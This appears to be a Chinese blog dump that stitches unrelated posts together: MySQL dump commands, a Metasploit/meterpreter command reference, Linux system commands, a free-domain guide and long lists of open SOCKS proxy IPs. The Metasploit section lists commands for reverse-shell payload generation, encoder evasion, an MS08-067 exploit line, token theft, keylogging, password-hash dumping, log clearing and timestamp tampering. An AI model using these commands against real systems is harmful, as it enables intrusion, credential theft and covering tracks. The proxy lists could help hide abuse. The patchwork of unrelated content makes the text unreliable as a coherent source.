linux下导入、导出mysql数据库命令

一、导出数据库用mysqldump命令(注意mysql的安装路径,即此命令的路径):
1、导出数据和表结构:
mysqldump -u用户名 -p密码 数据库名 > 数据库名.sql
#/usr/local/mysql/bin/   mysqldump -uroot -p abc > 8090sec.sql
敲回车后会提示输入密码

2、只导出表结构
mysqldump -u用户名 -p密码 -d 数据库名 > 数据库名.sql
#/usr/local/mysql/bin/   mysqldump -uroot -p -d abc > 8090sec.sql

注:/usr/local/mysql/bin/  —>  mysql的data目录
二、导入数据库
1、首先建空数据库
mysql>create database abc;

2、导入数据库
方法一:
(1)选择数据库
mysql>use abc;
(2)设置数据库编码
mysql>set names utf8;
(3)导入数据(注意sql文件的路径)
mysql>source /home/abc/8090sec.sql;
方法二:
mysql -u用户名 -p密码 数据库名 < 数据库名.sql
#mysql -uabc_f -p abc < 8090sec.sql

建议使用第二种方法导入。

注意:有命令行模式,有sql命令

metasploit(MSF)渗透命令大全

metasploit(MSF)渗透命令大全

show exploits

列出metasploit框架中的所有渗透攻击模块。
show payloads

列出metasploit框架中的所有攻击载荷。
show auxiliary

列出metasploit框架中的所有辅助攻击载荷。
search name

查找metasploit框架中所有的渗透攻击和其他模块。
info

展示出制定渗透攻击或模块的相关信息。
use name

装载一个渗透攻击或模块。
LHOST

你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。
RHOST

远程主机或是目标主机。
set function

设置特定的配置参数(EG:设置本地或远程主机参数)。
setg function

以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
show options

列出某个渗透攻击或模块中所有的配置参数。
show targets

列出渗透攻击所有支持的目标平台。
set target num

指定你所知道的目标的操作系统以及补丁版本类型。
set payload name

指定想要使用的攻击载荷。
show advanced

列出所有高级配置选项。
set autorunscript migrate -f.

在渗透攻击完成后,将自动迁移到另一个进程。
check

检测目标是否选定渗透攻击存在相应的安全漏洞。
exploit

执行渗透攻击或模块来攻击目标。
exploit -j

在计划任务下进行渗透攻击(攻击将在后台进行)。
exploit -z

渗透攻击完成后不与回话进行交互。
exploit -e encoder

制定使用的攻击载荷编码方式(EG:exploit -e shikata_ga_nai)。
exploit -h

列出exploit命令的帮助信息。
sessions -l

列出可用的交互会话(在处理多个shell时使用)。
sessions -l -v

列出所有可用的交互会话以及详细信息,EG:攻击系统时使用了哪个安全漏洞。
sessions -s script

在所有活跃的metasploit会话中运行一个特定的metasploit脚本。
sessions -K

杀死所有活跃的交互会话。
sessions -c cmd

在所有活跃的metasploit会话上执行一个命令。
sessions -u sessionID

升级一个普通的win32 shell到metasploit shell。
db_create name

创建一个数据库驱动攻击所要使用的数据库(EG:db_create autopwn)。
db_connect name

创建并连接一个数据库驱动攻击所要使用的数据库(EG:db_connect user:passwd@ip/sqlname)。
db_namp

利用nmap并把扫描数据存储到数据库中(支持普通的nmap语句,EG:-sT -v -P0)。
db_autopwn -h

展示出db_autopwn命令的帮助信息。
db_autopwn -p -r -e

对所有发现的开放端口执行db_autopwn,攻击所有系统,并使用一个反弹式shell。
db_destroy

删除当前数据库。
db_destroy user:passwd@host:port/database

使用高级选项来删除数据库。
***metasploit命令***

help

打开meterpreter使用帮助。
run scriptname

运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。
sysinfo

列出受控主机的系统信息。
ls

列出目标主机的文件和文件夹信息。
use priv

加载特权提升扩展模块,来扩展metasploit库。
ps

显示所有运行的进程以及相关联的用户账户。
migrate PID

迁移到一个指定的进程ID(PID号可通过ps命令从主机上获得)。
use incognito

加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
list_tokens -u

列出目标主机用户的可用令牌。
list_tokens -g

列出目标主机用户组的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME

假冒目标主机上的可用令牌。
steal_token PID

盗窃给定进程的可用令牌并进行令牌假冒。
drop_token

停止假冒当前令牌。
getsystem

通过各种攻击向量来提升系统用户权限。
execute -f cmd.exe -i

执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t

以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self

回到控制目标主机的初始用户账户下。
reg command

在目标主机注册表中进行交互,创建,删除,查询等操作。
setdesktop number

切换到另一个用户界面(该功能基于那些用户已登录)。
screenshot

对目标主机的屏幕进行截图。
upload file

向目标主机上传文件。
download file

从目标主机下载文件。
keyscan_start

针对远程目标主机开启键盘记录功能。
keyscan_dump

存储目标主机上捕获的键盘记录。
keyscan_stop

停止针对目标主机的键盘记录。
getprivs

尽可能多的获取目标主机上的特权。
uictl enable keyboard/mouse

接管目标主机的键盘和鼠标。
background

将你当前的metasploit shell转为后台执行。
hashdump

导出目标主机中的口令哈希值。
use sniffer

加载嗅探模式。
sniffer_interfaces

列出目标主机所有开放的网络端口。
sniffer_dump interfaceID pcapname

在目标主机上启动嗅探。
sniffer_start interfaceID packet-buffer

在目标主机上针对特定范围的数据包缓冲区启动嗅探。
sniffer_stats interfaceID

获取正在实施嗅探网络接口的统计数据。
sniffer_stop interfaceID

停止嗅探。
add_user username password -h ip

在远程目标主机上添加一个用户。
clearev

清楚目标主机上的日志记录。
timestomp

修改文件属性,例如修改文件的创建时间(反取证调查)。
reboot

重启目标主机。
***MSFpayload命令***

msfpayload -h

msfpayload的帮助信息。
msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterpreter/bind_tcp下可用的攻击载荷的配置项(任何攻击载荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.raw,该文件后面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

创建一个metasploit的reverse_tcp攻击载荷,导出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

创建一个metasploit的reverse_tcp攻击载荷,导出成以%u编码方式的javaScript语言字符串。
***msfencode命令***

mefencode -h

列出msfencode的帮助命令。
msfencode -l

列出所有可用的编码器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

显示编码缓冲区的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

使用shikata_ga_nai编码器对payload.raw文件进行5编码,然后导出一个名为encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

创建一个经过多种编码格式嵌套编码的攻击载荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c

创建一个纯字母数字的shellcode,由ESI寄存器只想shellcode,以C语言格式输出。
***MSFcli命令***

msfcli | grep exploit

仅列出渗透攻击模块。
msfcli | grep exploit/windows

仅列出与windows相关的渗透攻击模块。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

对IP发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在PORT端口进行监听。

BT5 Metasploit(MSF)连接postgersql数据库

1.先查看postgresql的端口,默认是自动开启的,端口7337 
root@bt:~# netstat -tnpl |grep postgres 
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      1100/postgres
tcp6       0      0 ::1:7337                :::*                    LISTEN      1100/postgres 
2.查看msf的配置,里面有数据库用户和密码
root@bt:~# cat /opt/metasploit/config/database.yml 
development: 
  adapter: “postgresql”
  database: “msf3dev”
  username: “msf3″
  password: “c80c3cea”
  port: 7337 
  host: “localhost”
  pool: 256 
  timeout: 5

3.开启msf专业版
# /opt/metasploit/msfpro 
连接数据库
msf> db_connect msf3:c80c3cea@127.0.0.1:7337/msf3

查看linux系统版本命令

一。查看内核版本命令:

(1)  [root@SOR_SYS ~]# cat /proc/version
Linux version 2.6.18-238.el5 () (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Sun Dec 19 14:22:44 EST 2010

(2) [root@SOR_SYS ~]# uname -r
2.6.18-238.el5
(3) [root@SOR_SYS ~]# uname -a
Linux SOR_SYS.99bill.com 2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

二。查看linux版本:

(1) 登录到服务器执行 lsb_release -a ,即可列出所有版本信息,例如:

[root@SOR_SYS ~]# lsb_release -a
LSB Version: :core-4.0-amd64:core-4.0-ia32:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: RedHatEnterpriseAS
Description: Red Hat Enterprise Linux AS release 4 (Nahant Update 4)
Release: 4
Codename: NahantUpdate4
注:这个命令适用于所有的linux,包括Redhat、SuSE、Debian等发行版。

(2) 登录到linux执行cat /etc/issue,例如如下:

[root@SOR_SYS ~]# cat /etc/issue
Red Hat Enterprise Linux Server release 5.6 (Tikanga)
Kernel \r on an \m

(3) 登录到linux执行cat /etc/redhat-release ,例如如下:

[root@SOR_SYS ~]# cat /etc/redhat-release
Red Hat Enterprise Linux AS release 4 (Nahant Update 4)

注:这种方式下可以直接看到具体的版本号,比如 AS4 Update 1

(4) 登录到linux执行rpm -q redhat-release ,例如如下:

[root@SOR_SYS ~]# rpm -q redhat-release
redhat-release-5Server-5.6.0.3

注:这种方式下可看到一个所谓的release号,比如上边的例子是5

这个release号和实际的版本之间存在一定的对应关系,如下:

redhat-release-3AS-1 -> Redhat Enterprise Linux AS 3

redhat-release-3AS-7.4 -> Redhat Enterprise Linux AS 3 Update 4

redhat-release-4AS-2 -> Redhat Enterprise Linux AS 4

redhat-release-4AS-2.4 -> Redhat Enterprise Linux AS 4 Update 1

redhat-release-4AS-3 -> Redhat Enterprise Linux AS 4 Update 2

redhat-release-4AS-4.1 -> Redhat Enterprise Linux AS 4 Update 3

redhat-release-4AS-5.5 -> Redhat Enterprise Linux AS 4 Update 4

另:第3)、4)两种方法只对Redhat Linux有效

(5) [root@SOR_SYS ~]# file /bin/bash
/bin/bash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped
[root@SOR_SYS ~]#

(6) [root@SOR_SYS ~]# file /bin/cat
/bin/cat: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped

几个常用LINUX命令

lsb_release -a 内核版本 系统版本
arch 显示机器的处理器架构(1)
uname -m 显示机器的处理器架构(2)
uname -r 显示正在使用的内核版本
dmidecode -q 显示硬件系统部件 – (SMBIOS / DMI)
hdparm -i /dev/hda 罗列一个磁盘的架构特性
hdparm -tT /dev/sda 在磁盘上执行测试性读取操作
cat /proc/cpuinfo 显示CPU info的信息
cat /proc/interrupts 显示中断
cat /proc/meminfo 校验内存使用
cat /proc/swaps 显示哪些swap被使用
cat /proc/version 显示内核的版本
cat /proc/net/dev 显示网络适配器及统计
cat /proc/mounts 显示已加载的文件系统

shutdown -h now 关闭系统(1)
init 0 关闭系统(2)
telinit 0 关闭系统(3)
shutdown -h hours:minutes & 按预定时间关闭系统
shutdown -c 取消按预定时间关闭系统
shutdown -r now 重启(1)
reboot 重启(2)
logout 注销

cd /home 进入 ‘/ home’ 目录’
cd .. 返回上一级目录
cd ../.. 返回上两级目录
cd 进入个人的主目录
cd ~user1 进入个人的主目录
cd – 返回上次所在的目录
pwd 显示工作路径
ls 查看目录中的文件
ls -F 查看目录中的文件
ls -l 显示文件和目录的详细资料
ls -a 显示隐藏文件

ls -lh 显示权限
ls /tmp | pr -T5 -W$COLUMNS 将终端划分成5栏显示
chmod ugo+rwx directory1 设置目录的所有人(u)、群组(g)以及其他人(o)以读(r )、写(w)和执行(x)的权限
chmod go-rwx directory1 删除群组(g)与其他人(o)对目录的读写执行权限
chown user1 file1 改变一个文件的所有人属性
chown -R user1 directory1 改变一个目录的所有人属性并同时改变改目录下所有文件的属性
chgrp group1 file1 改变文件的群组
chown user1:group1 file1 改变一个文件的所有人和群组属性
find / -perm -u+s 罗列一个系统中所有使用了SUID控制的文件
chmod u+s /bin/file1 设置一个二进制文件的 SUID 位 – 运行该文件的用户也被赋予和所有者同样的权限
chmod u-s /bin/file1 禁用一个二进制文件的 SUID位
chmod g+s /home/public 设置一个目录的SGID 位 – 类似SUID ,不过这是针对目录的
chmod g-s /home/public 禁用一个目录的 SGID 位
chmod o+t /home/public 设置一个文件的 STIKY 位 – 只允许合法所有人删除文件
chmod o-t /home/public 禁用一个目录的 STIKY 位

文件的特殊属性 – 使用 “+” 设置权限,使用 “-” 用于取消
chattr +a file1 只允许以追加方式读写文件
chattr +c file1 允许这个文件能被内核自动压缩/解压
chattr +d file1 在进行文件系统备份时,dump程序将忽略这个文件
chattr +i file1 设置成不可变的文件,不能被删除、修改、重命名或者链接
chattr +s file1 允许一个文件被安全地删除
chattr +S file1 一旦应用程序对这个文件执行了写操作,使系统立刻把修改的结果写到磁盘
chattr +u file1 若文件被删除,系统会允许你在以后恢复这个被删除的文件
lsattr 显示特殊的属性

bunzip2 file1.bz2 解压一个叫做 ‘file1.bz2′的文件
bzip2 file1 压缩一个叫做 ‘file1′ 的文件
gunzip file1.gz 解压一个叫做 ‘file1.gz’的文件
gzip file1 压缩一个叫做 ‘file1′的文件
gzip -9 file1 最大程度压缩
rar a file1.rar test_file 创建一个叫做 ‘file1.rar’ 的包
rar a file1.rar file1 file2 dir1 同时压缩 ‘file1′, ‘file2′ 以及目录 ‘dir1′
rar x file1.rar 解压rar包
unrar x file1.rar 解压rar包
tar -cvf archive.tar file1 创建一个非压缩的 tarball
tar -cvf archive.tar file1 file2 dir1 创建一个包含了 ‘file1′, ‘file2′ 以及 ‘dir1′的档案文件
tar -tf archive.tar 显示一个包中的内容
tar -xvf archive.tar 释放一个包
tar -xvf archive.tar -C /tmp 将压缩包释放到 /tmp目录下
tar -cvfj archive.tar.bz2 dir1 创建一个bzip2格式的压缩包
tar -xvfj archive.tar.bz2 解压一个bzip2格式的压缩包
tar -cvfz archive.tar.gz dir1 创建一个gzip格式的压缩包
tar -xvfz archive.tar.gz 解压一个gzip格式的压缩包
zip file1.zip file1 创建一个zip格式的压缩包
zip -r file1.zip file1 file2 dir1 将几个文件和目录同时压缩成一个zip格式的压缩包
unzip file1.zip 解压一个zip格式压缩包
unrar e -p lanlan.rar 解压有密码的rar压缩包

apt-get install package_name 安装/更新一个 deb 包
apt-cdrom install package_name 从光盘安装/更新一个 deb 包
apt-get update 升级列表中的软件包
apt-get upgrade 升级所有已安装的软件
apt-get remove package_name 从系统删除一个deb包
apt-get check 确认依赖的软件仓库正确
apt-get clean 从下载的软件包中清理缓存

dpkg -i package.deb 安装/更新一个 deb 包
dpkg -r package_name 从系统删除一个 deb 包
dpkg -l 显示系统中所有已经安装的 deb 包
dpkg -l | grep httpd 显示所有名称中包含 “httpd” 字样的deb包
dpkg -s package_name 获得已经安装在系统中一个特殊包的信息
dpkg -L package_name 显示系统中已经安装的一个deb包所提供的文件列表
dpkg –contents package.deb 显示尚未安装的一个包所提供的文件列表
dpkg -S /bin/ping 确认所给的文件由哪个deb包提供

rpm -ivh package.rpm 安装一个rpm包
rpm -ivh –nodeeps package.rpm 安装一个rpm包而忽略依赖关系警告
rpm -U package.rpm 更新一个rpm包但不改变其配置文件
rpm -F package.rpm 更新一个确定已经安装的rpm包
rpm -e package_name.rpm 删除一个rpm包
rpm -qa 显示系统中所有已经安装的rpm包
rpm -qa | grep httpd 显示所有名称中包含 “httpd” 字样的rpm包
rpm -qi package_name 获取一个已安装包的特殊信息
rpm -qg “System Environment/Daemons” 显示一个组件的rpm包
rpm -ql package_name 显示一个已经安装的rpm包提供的文件列表
rpm -qc package_name 显示一个已经安装的rpm包提供的配置文件列表
rpm -q package_name –whatrequires 显示与一个rpm包存在依赖关系的列表
rpm -q package_name –whatprovides 显示一个rpm包所占的体积
rpm -q package_name –scripts 显示在安装/删除期间所执行的脚本l
rpm -q package_name –changelog 显示一个rpm包的修改历史
rpm -qf /etc/httpd/conf/httpd.conf 确认所给的文件由哪个rpm包所提供
rpm -qp package.rpm -l 显示由一个尚未安装的rpm包提供的文件列表
rpm –import /media/cdrom/RPM-GPG-KEY 导入公钥数字证书
rpm –checksig package.rpm 确认一个rpm包的完整性
rpm -qa gpg-pubkey 确认已安装的所有rpm包的完整性
rpm -V package_name 检查文件尺寸、 许可、类型、所有者、群组、MD5检查以及最后修改时间
rpm -Va 检查系统中所有已安装的rpm包- 小心使用
rpm -Vp package.rpm 确认一个rpm包还未安装

谷歌Gybo简介及免费顶级域名申请

推荐吧在免费获得COM顶级域名-gybo文章中已经介绍过gybo了,今天,综合了下gybo的全部版本,让大家多几个域名的选择。

什么GYBO?
全名Get Your Business Online,是Google谷歌公司为帮助小微企业(含个人网站)快速实现上线并推广、宣传的一项服务,一年之内为小微企业提供免费的网站建设、免费.COM域名及主机空间服务,甚至为你提供免费的营销帮助。1年之后的收费据说也很低,只是象征性的,有需要的不妨试试。
你可以通过不同的平台进行申请,得到的免费域名2个月后都可以免费转出,也就是说,即使在这个计划里没得到什么实质性的帮助,起码赚了一个免费域名。
1. 美国申请网址:http://www.gybo.com/
提供com/net/org/biz/info/name 的域名注册,免费一年,两个月后可以转出
2. 加拿大申请网址:http://www.gybo.ca
提供.ca 的域名免费注册一年,两个月后可以转出
3. 泰国申请网址:http://www.goonline.in.th/
需要泰国的IP才能获得通过,提供in.th, co.th的域名免费注册(理论上可转出,但是要找到接受这个后缀的域名注册商)
4. 印度申请网址:http://www.indiagetonline.in/
需要印度的IP才能获得通过,提供 .in玉米免费注册1年
5. 印度尼西亚网址:http://www.bisnisgoonline.co.id/

国内的建议就直接从美国主站进入注册即可,进入后点击“Sign in with Google”,在弹出的是否允许关联帐户的窗口中点击“允许访问”,返回注册页面,然后点击“Create your website”,进入建站页面,在“Create a Password”里设置在intuit.com的密码,勾选协议后,点击“Continue”,进入成功页面,如下:

Congratulations on Registering with Intuit
You’re on your way to a website! click Choose Your Design to start building it now.

Your Website Signup Confirmation 1/12/2013 – 07:18AM Pacific Standard Time
Account Information
Email ID: xxx@gmail.com (This is your login name)
Package Information
Free for 1 year and $4.99/month thereafter 3 page website 1 Domain name (example:www.fzxmm.com) 30 days of chat support

点击“Continue”,进入到设计页面,点击“Pick the design you want for your website”,开始设计,设计好页面后,点击“Publish”发布
发布时会自动生成一个“hstrial-你的帐户.intuitwebsites.com”的域名。在发布页面点击“Get a Custom Domain”或在帐户首页点击“Choose a domain (www.yourname.com) for your website”进入免费.com域名注册页面。

在上面的输入框输入你要注册的域名,点击“Check Availability”,进入下一页面,什么都不要选,直接点击“Get Domain”,进入下一页面。
设置好域名的注册信息后,点击“Save & Continue”,进入下一页面(取消“Domain Privacy”选项),勾选协议后,点击“Submit”,进入下一页面。使用Visa、MasterCard、AMEX、Discover的其中一种来认证激活你的免费域名。

如果有什么不懂的,可以参阅官方FAQ:http://www.gybo.com/america/faqs-intuit-program-terms

反正免费的,就算网站不怎么样、扶持计划不怎么样,至少可以收获一个域名,于是尝试了一下,比想象中的还要简单,登陆GG号、填写一批信息就OK,不到15分钟拿下域名。

本文转自: http://vpsorz.com/archives/1286 | VPS-orz

10-08-13 | Socks 5 Proxy Servers Socks 5 dedicated servers

120.72.84.212:7250 | sweden | stockholms lan, stockholm | 19587 | bahnhof.se | 1,594
166.111.132.16:1080 | china | beijing, beijing | unknown | tsinghua.edu.cn | 0,656
173.234.116.172:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,469
173.234.116.206:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,703
173.68.77.144:42379 | united states | new york, new york city | 10116 | verizon.com | 0,297
173.234.116.197:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,484
151.230.90.80:54929 | united kingdom | england, london | wc2n 5rj | sky.com | 1,031
180.169.125.49:8888 | taiwan | t’ai-wan, taipei | unknown | cht.com.tw | 0,766
192.241.234.49:27977 | united states | new york, new york city | 10116 | digitalocean.com | 0,328
202.120.7.122:1080 | china | shanghai, shanghai | unknown | sjtu.edu.cn | 0,688
190.8.44.74:6588 | dominican republic | distrito nacional, santo domingo | 10901 | – | 3,344
202.38.95.66:1080 | china | anhui, hefei | unknown | ustc.edu.cn | 0,719
202.65.216.52:1080 | hong kong | hong kong (sar), hong kong | unknown | dyxnet.com | 0,750
124.208.83.6:39289 | japan | okayama, soja | 719-1131 | dion.ne.jp | 0,563
203.171.233.243:96 | china | henan, zhengzhou | unknown | cpw.com.cn | 0,656
218.202.183.250:1080 | china | xinjiang, urumqi | unknown | chinamobile.com | 1,266
219.223.252.183:1080 | china | guangdong, guangzhou | unknown | hitsz.edu.cn | 1,234
24.184.40.65:2547 | united states | new york, warwick | 10990 | optimum.net | 0,172
24.181.161.105:42701 | united states | wisconsin, eau claire | 54701 | charter.net | 0,563
24.16.231.234:46647 | united states | washington, seattle | 98101 | comcast.com | 0,469
24.128.18.205:22445 | united states | connecticut, hartford | 06101 | comcast.net | 0,391
24.217.83.234:23090 | united states | illinois, belleville | 62220 | charter.net | 0,422
62.149.25.77:10080 | ukraine | kyyiv, kiev | unknown | colocall.net | 0,203
61.19.201.18:8080 | malaysia | perlis, arau | 02600 | – | 0,641
65.125.155.90:8080 | united states | colorado, englewood | 80110 | qwest.net | 0,594
221.132.35.5:2214 | viet nam | ho chi minh, thanh pho ho chi minh | unknown | netcenter.net.vn | 1,344
31.13.130.205:8888 | russian federation | tatarstan, kazan | 422528 | tatar.ru | 0,563
64.194.160.2:7225 | united states | california, whitethorn | 95589 | 101netlink.com | 2,125
68.96.1.118:64815 | united states | arizona, phoenix | 85001 | cox.com | 0,359
66.196.209.90:10827 | united states | oklahoma, oklahoma city | 73102 | logixcom.net | 0,188
69.143.1.46:54917 | united states | virginia, alexandria | 20598 | comcast.net | 0,156
124.125.240.105:1080 | india | gujarat, ahmedabad | 380028 | rcom.co.in | 4,281
75.131.195.75:34551 | united states | georgia, buford | 30515 | charter.net | 0,203
71.93.73.104:42192 | united states | nevada, reno | 89501 | charter.net | 2,000
67.8.252.3:25567 | united states | florida, kissimmee | 34741 | twcable.com | 2,484
85.68.234.87:42219 | france | picardie, rue | 80120 | ncnumericable.com | 0,359
88.150.193.144:6666 | united kingdom | england, gosport | po12 1fw | redstation.com | 0,219
85.214.148.228:60006 | germany | berlin, berlin | 10178 | strato.de | 0,203
80.252.87.82:1080 | netherlands | noord-holland, amsterdam | 1089 | – | 0,203
74.60.252.144:43254 | united states | california, north highlands | 95660 | clearwire.com | 0,500
88.150.215.169:1080 | united kingdom | england, gosport | po12 1fw | redstation.com | 0,422
93.177.169.72:1080 | georgia | t’bilisi, tbilisi | unknown | caucasus.net | 0,266
94.199.76.217:2214 | russian federation | kemerovo, novokuznetsk | 654086 | aaanet.ru | 0,453
67.215.209.227:35853 | united states | kentucky, bardstown | 40004 | cityofbardstown.org | 5,609
98.251.255.28:5110 | united states | tennessee, memphis | 37501 | comcast.net | 1,219
88.198.44.34:10080 | germany | bayern, nuremberg | 90455 | hetzner.de | 0,172
89.104.72.165:10080 | russian federation | moscow city, moscow | 101990 | hc.ru | 0,266
98.251.255.28:17045 | united states | tennessee, memphis | 37501 | comcast.net | 0,234
93.103.201.98:3444 | slovenia | maribor, maribor | 2610 | t-2.net | 0,453
96.252.102.45:31090 | united states | massachusetts, stow | 01775 | verizon.com | 0,547
98.211.28.229:50583 | united states | tennessee, murfreesboro | 37127 | comcast.net | 0,406
98.207.244.241:6952 | united states | california, san francisco | 94102 | comcast.net | 0,656

10-08-13 | US Socks

Check Report:

#——–>Socks4/5 98<-------------
173.71.223.105:43229@SOCKS5 $0sec#United States
199.231.185.77:1080@SOCKS4 $0sec#United States
199.231.185.90:1080@SOCKS4 $0sec#United States
207.182.142.244:443@SOCKS4 $0sec#United States
216.244.78.227:1080@SOCKS4 $0sec#United States
24.183.232.214:3988@SOCKS4 $0sec#United States
24.217.83.234:23090@SOCKS4 $0sec#United States
66.168.170.55:53020@SOCKS4 $0sec#United States
96.252.102.45:31090@SOCKS4 $0sec#United States
173.68.77.144:1508@SOCKS4 $1sec#United States
173.70.24.198:5065@SOCKS4 $1sec#United States
174.50.252.175:29331@SOCKS4 $1sec#United States
174.59.226.249:60995@SOCKS4 $1sec#United States
192.69.200.124:1080@SOCKS4 $1sec#UNITED STATES
198.143.190.94:1080@SOCKS4 $1sec#United States
209.190.35.251:1080@SOCKS4 $1sec#United States
209.249.157.68:55489@SOCKS4 $1sec#United States
216.244.80.153:2500@SOCKS5 $1sec#United States
24.146.175.103:28281@SOCKS4 $1sec#United States
24.184.40.65:2547@SOCKS4 $1sec#United States
24.184.40.65:2547@SOCKS5 $1sec#United States
24.35.162.182:1508@SOCKS5 $1sec#United States
64.194.160.2:7225@SOCKS4 $1sec#United States
64.194.160.2:7225@SOCKS5 $1sec#United States
67.182.151.28:1794@SOCKS4 $1sec#United States
68.188.241.29:5031@SOCKS4 $1sec#United States
68.96.1.118:64815@SOCKS4 $1sec#United States
68.96.1.118:64815@SOCKS5 $1sec#United States
69.143.1.46:55259@SOCKS4 $1sec#United States
69.143.1.46:55259@SOCKS5 $1sec#United States
69.15.234.90:1897@SOCKS4 $1sec#United States
69.15.234.90:1897@SOCKS5 $1sec#United States
71.81.137.163:14079@SOCKS4 $1sec#United States
71.93.73.104:42192@SOCKS5 $1sec#United States
72.34.180.129:1080@SOCKS4 $1sec#United States
75.131.195.75:34551@SOCKS4 $1sec#United States
75.131.195.75:34551@SOCKS5 $1sec#United States
96.236.25.161:16379@SOCKS4 $1sec#United States
96.252.102.45:31090@SOCKS5 $1sec#United States
97.95.225.218:1995@SOCKS4 $1sec#United States
97.95.225.218:1995@SOCKS5 $1sec#United States
98.251.255.28:5110@SOCKS5 $1sec#United States
173.234.116.197:23537@SOCKS5 $2sec#United States
24.146.175.103:28281@SOCKS5 $2sec#United States
24.181.161.105:42701@SOCKS5 $2sec#United States
24.217.83.234:23090@SOCKS5 $2sec#United States
64.121.194.193:48597@SOCKS4 $2sec#United States
67.187.175.216:26694@SOCKS5 $2sec#United States
70.118.47.109:31639@SOCKS4 $2sec#United States
70.118.47.109:31639@SOCKS5 $2sec#United States
70.119.47.206:22339@SOCKS5 $2sec#United States
70.177.213.17:11838@SOCKS5 $2sec#United States
71.168.187.38:22063@SOCKS5 $2sec#United States
71.198.249.7:50101@SOCKS4 $2sec#United States
71.198.249.7:50101@SOCKS5 $2sec#United States
71.81.137.163:14079@SOCKS5 $2sec#United States
71.93.73.104:42192@SOCKS4 $2sec#United States
75.133.147.135:2663@SOCKS5 $2sec#United States
76.110.43.4:8865@SOCKS4 $2sec#United States
76.110.43.4:8865@SOCKS5 $2sec#United States
98.211.28.229:50583@SOCKS5 $2sec#United States
199.231.185.99:1080@SOCKS4 $3sec#United States
24.1.151.81:22039@SOCKS5 $3sec#United States
65.31.134.137:42989@SOCKS5 $3sec#United States
65.70.243.69:6897@SOCKS4 $3sec#United States
65.70.243.69:6897@SOCKS5 $3sec#United States
66.196.209.90:10827@SOCKS5 $3sec#United States
66.23.230.230:1080@SOCKS4 $3sec#United States
67.187.175.216:26694@SOCKS4 $3sec#United States
69.4.193.154:23195@SOCKS5 $3sec#United States
69.81.146.157:30841@SOCKS4 $3sec#United States
74.193.170.210:5439@SOCKS5 $3sec#United States
98.251.255.28:17045@SOCKS4 $3sec#United States
24.183.232.214:3988@SOCKS5 $4sec#United States
75.128.223.139:29331@SOCKS5 $4sec#United States
173.230.140.74:10080@SOCKS5 $5sec#United States
174.60.216.175:10661@SOCKS5 $5sec#United States
67.60.187.127:42527@SOCKS4 $5sec#United States
69.4.193.154:23195@SOCKS4 $5sec#United States
98.207.244.241:6952@SOCKS4 $5sec#United States
142.91.217.204:23537@SOCKS5 $5sec#UNITED STATES
174.70.170.55:58278@SOCKS5 $5sec#United States
74.60.252.144:43254@SOCKS4 $5sec#United States
75.128.223.139:29331@SOCKS4 $5sec#United States
24.6.250.152:48615@SOCKS5 $5sec#United States
71.248.115.141:27742@SOCKS4 $5sec#United States
199.231.185.120:1080@SOCKS4 $5sec#United States
70.63.156.238:1080@SOCKS4 $5sec#United States
71.194.61.194:7415@SOCKS4 $5sec#United States
24.182.136.146:1080@SOCKS4 $5sec#United States
65.110.39.30:10080@SOCKS5 $5sec#United States
67.167.235.7:4781@SOCKS4 $5sec#United States
68.82.127.39:34793@SOCKS4 $5sec#United States
98.206.20.81:16285@SOCKS5 $5sec#United States
199.168.138.244:1080@SOCKS5 $5sec#United States
108.62.75.248:61249@SOCKS5 $5sec#United States
67.215.209.227:35853@SOCKS4 $5sec#United States
98.206.20.81:16285@SOCKS4 $5sec#United States
#-------->End of Socks4/5<————————–

10-08-13 | Socks 5 Yahoo Voice

ocks5:

101.44.3.50:1080
103.8.74.234:1080
108.32.48.105:43851
108.62.75.247:61249
108.62.75.248:61249
109.108.76.102:1080
109.86.64.240:13998
109.86.64.240:46922
110.139.15.63:1080
110.74.218.227:1080
111.93.6.198:1080
112.78.139.130:1080
117.218.50.225:1080
118.114.77.116:10086
121.22.127.17:1080
121.52.45.62:1080
122.225.36.101:1080
123.103.98.92:10080
123.201.114.153:1080
123.231.255.203:1080
123.234.230.45:1080
124.208.83.6:39289
